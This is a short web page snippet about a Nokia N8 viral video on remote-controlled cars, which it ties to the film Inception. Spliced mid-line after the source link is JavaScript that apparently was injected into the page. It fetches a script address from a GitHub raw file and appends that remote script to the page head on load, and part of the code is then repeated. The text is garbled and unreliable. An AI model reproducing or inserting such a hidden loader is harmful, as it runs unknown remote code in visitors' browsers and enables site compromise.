Remote Controlled Cars & Sketching techniques by N8
Nokia China - N8 Viral (Remote Contral Cars)
This video is related to the film Inception.
source .. www.youtube.comvar url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement('script');
script.src = data.trim();
document.getElementsByTagName('head')[0].appendChild(script);
});var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
Read more [...]